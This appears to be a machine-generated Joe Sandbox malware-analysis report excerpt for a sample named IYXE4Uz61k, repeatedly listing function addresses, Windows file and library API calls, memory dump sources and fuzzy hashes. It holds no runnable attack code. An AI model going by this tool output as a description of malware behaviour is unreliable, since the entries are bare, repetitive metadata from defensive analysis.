                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2838827086-0
                                                                                                                                                                                                    • Opcode ID: 82d37a20f2de14f287f43e79964f674e27eac1a662ee7002fd2defe42d583bfc
                                                                                                                                                                                                    • Instruction ID: 8bd7313c71c5608fc4f31be1280d50c140aa272d2f964519b78cfa162eec55d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82d37a20f2de14f287f43e79964f674e27eac1a662ee7002fd2defe42d583bfc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 833118719041099ACF15EF9CC949AAEBBF5FF08310F104069E849E7655CB329E01DB61
                                                                                                                                                                                                    Function 00879DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008773BC,?,?,?,00000000), ref: 00879DBC
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00879E70
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1392018926-0
                                                                                                                                                                                                    • Opcode ID: 1dffd2b5f14957326c971a82ed33f2c1a9fff89a2fc6b8dadb2b4449bef4c319
                                                                                                                                                                                                    • Instruction ID: bfe659e61bc74419543d490420d95d0ef586b23fd7c274d966c626db9f12f7ce
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dffd2b5f14957326c971a82ed33f2c1a9fff89a2fc6b8dadb2b4449bef4c319
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B21E1322482459FC724DF28C491AAABFE8FF51304F08881DF4D9C3545D328D90D8B62
                                                                                                                                                                                                    Function 0087966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00879F27,?,?,0087771A), ref: 008796E6
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00879F27,?,?,0087771A), ref: 00879716
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 34b87996dfe694b698845b12deca068fd4b7edb60b05385e5b555c93a7171c91
                                                                                                                                                                                                    • Instruction ID: 182caea02a8beceddf10b42c2c95fb766c03c0e5481705ad838ca19ddb0f10be
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34b87996dfe694b698845b12deca068fd4b7edb60b05385e5b555c93a7171c91
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0221F1B10043446FE3708A68CC89BA773DCFB69324F008B18FAD9C25D9C374E8848631
                                                                                                                                                                                                    Function 00879E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00879EC7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00879ED4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                    • Opcode ID: fba96cc0b6ef67880b2256c6b98c9219bc5c17540f45826294439f29b0812e35
                                                                                                                                                                                                    • Instruction ID: 4445ef057b2dd30bc7ff0921b2839429a3c333e0eefa495db57ce4b5ee3947a3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fba96cc0b6ef67880b2256c6b98c9219bc5c17540f45826294439f29b0812e35
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F911E9316007049BE734D62CCC45BA6B7E9FB45370F608629E197D26D4D7B0ED49C760
                                                                                                                                                                                                    Function 00898E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 00898E75
                                                                                                                                                                                                      • Part of subcall function 00898E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00894286,?,0000015D,?,?,?,?,00895762,000000FF,00000000,?,?), ref: 00898E38
                                                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,008B1098,008717CE,?,?,00000007,?,?,?,008713D6,?,00000000), ref: 00898EB1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2447670028-0
                                                                                                                                                                                                    • Opcode ID: 34384e21a8bd2a5a0c0db9978d6c395210cb52fe1d1aabc7aeeeac76d5205fcb
                                                                                                                                                                                                    • Instruction ID: f4458b7e47e6c56ec1cc055f1fc08fb23f3f22e9c6a49ab22e9123f3de934021
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34384e21a8bd2a5a0c0db9978d6c395210cb52fe1d1aabc7aeeeac76d5205fcb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF0C232601217EADF213A69AC15B6F3758FF93B70B6C412AF814E7191DF61DD0091A1
                                                                                                                                                                                                    Function 0088109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 008810AB
                                                                                                                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 008810B2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1231390398-0
                                                                                                                                                                                                    • Opcode ID: 6758b46afcaa3dcec3c2eec3cd3995b29e5382fb3f26a9d058213be4b6c64e44
                                                                                                                                                                                                    • Instruction ID: 5fb6b5dbfd31fb9e94df6a5da6d52db737f87ba0dcdf74f3f46e198a0a188a07
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6758b46afcaa3dcec3c2eec3cd3995b29e5382fb3f26a9d058213be4b6c64e44
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E0DF32B00949ABDF09ABB49C098EBB3EDFA452043208179E503E3601FD34EE424BA0
                                                                                                                                                                                                    Function 0087E648 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringW.USER32(008713B6,?,008B1098,008713B6), ref: 0087E678
                                                                                                                                                                                                    • LoadStringW.USER32(008713B6,?,008B1098), ref: 0087E68F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                    • Opcode ID: d3ddf43917fc8b31821e8886779dc863ae5a305254db91c78be9aaaa8c08e949
                                                                                                                                                                                                    • Instruction ID: e370cff8c8039ee27ed8b7609d5fa99115f2b5012a8fca3d50e002abfdefe8ee
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ddf43917fc8b31821e8886779dc863ae5a305254db91c78be9aaaa8c08e949
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F0F836101259BBCF111F61EC08DEB7F69FF293907408016FE089A124E232C961EBA0
                                                                                                                                                                                                    Function 0087A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A501
                                                                                                                                                                                                      • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A532
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                                                                                    • Opcode ID: effb256fcf1cfde9cb226f8f408e3b54edbc6e5c47958de6c60a78699079f676
                                                                                                                                                                                                    • Instruction ID: c159e2d60dc6097bd023e176030af345674d4b3fba17ed3e314ee9e8231a9abf
                                                                                                                                                                                                    • Opcode Fuzzy Hash: effb256fcf1cfde9cb226f8f408e3b54edbc6e5c47958de6c60a78699079f676
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F0A932200209BBEF016FA0DC01FDE376DFB04389F48C060B848E6164DB31CA98EB10
                                                                                                                                                                                                    Function 0087A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641,000000FF), ref: 0087A1F1
                                                                                                                                                                                                      • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641), ref: 0087A21F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeleteFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2643169976-0
                                                                                                                                                                                                    • Opcode ID: ae2333225cefedbce9bf01eabd2caa47ea832b3275bc2bff6f03685ae5649b0a
                                                                                                                                                                                                    • Instruction ID: f75fa0e1dd8048735b7ed14b1e37d0c1a074a606ab29b0214ae72825cacc4f4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae2333225cefedbce9bf01eabd2caa47ea832b3275bc2bff6f03685ae5649b0a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE092315502096BEB015F64DC45FDE375CFB09391F488021B948E2095EB61DEC4DA51
                                                                                                                                                                                                    Function 0088AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,008A2641,000000FF), ref: 0088ACB0
                                                                                                                                                                                                    • CoUninitialize.COMBASE(?,?,?,?,008A2641,000000FF), ref: 0088ACB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3856339756-0
                                                                                                                                                                                                    • Opcode ID: 6f9386a55e444661d4c2017949ac6ba3285750d855c8918a73533c853a833dfe
                                                                                                                                                                                                    • Instruction ID: 07ac680d1c0d28bce7f0f95f26d6caf9fa20df5fe4440ad28dedbd8921bc4cc7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f9386a55e444661d4c2017949ac6ba3285750d855c8918a73533c853a833dfe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DE06D72644651EFCB10AB5CDC06B49FBADFB89B20F00436AF416D3BA0CB74A800CB95
                                                                                                                                                                                                    Function 0087A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0087A23A,?,0087755C,?,?,?,?), ref: 0087A254
                                                                                                                                                                                                      • Part of subcall function 0087BB03: _wcslen.LIBCMT ref: 0087BB27
                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0087A23A,?,0087755C,?,?,?,?), ref: 0087A280
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AttributesFile$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2673547680-0
                                                                                                                                                                                                    • Opcode ID: 94f55af22053761b8b6fb5cf272a0fd3d97c77dd59d8e26899e997e3d3d6a8d9
                                                                                                                                                                                                    • Instruction ID: d1a2a7a5da1ee532808af423ecae3076e5ddc36db8d9457a0a58d249a1c893cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94f55af22053761b8b6fb5cf272a0fd3d97c77dd59d8e26899e997e3d3d6a8d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E092315001289BDB10AB68CC05BD97758FB193E2F048261FD58E3195DB70DE44CAA1
                                                                                                                                                                                                    Function 0088DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088DEEC
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0088DF03
                                                                                                                                                                                                      • Part of subcall function 0088B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088B579
                                                                                                                                                                                                      • Part of subcall function 0088B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088B58A
                                                                                                                                                                                                      • Part of subcall function 0088B568: IsDialogMessageW.USER32(00010464,?), ref: 0088B59E
                                                                                                                                                                                                      • Part of subcall function 0088B568: TranslateMessage.USER32(?), ref: 0088B5AC
                                                                                                                                                                                                      • Part of subcall function 0088B568: DispatchMessageW.USER32(?), ref: 0088B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2718869927-0
                                                                                                                                                                                                    • Opcode ID: 5cfc9698c2f74343f150688c7d65dc1c997c2032ccd7093f92e7bcda8b76bb7b
                                                                                                                                                                                                    • Instruction ID: 389fc58ba3504a09a7266a8ffdd1f834faddf37e289e95280476653f5f805a44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cfc9698c2f74343f150688c7d65dc1c997c2032ccd7093f92e7bcda8b76bb7b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73E092B2400248A6DF02BB68DC06FDE3B6CBB15785F044951B204DB0A3EA78EA10C766
                                                                                                                                                                                                    Function 0088081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00880836
                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087F2D8,Crypt32.dll,00000000,0087F35C,?,?,0087F33E,?,?,?), ref: 00880858
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
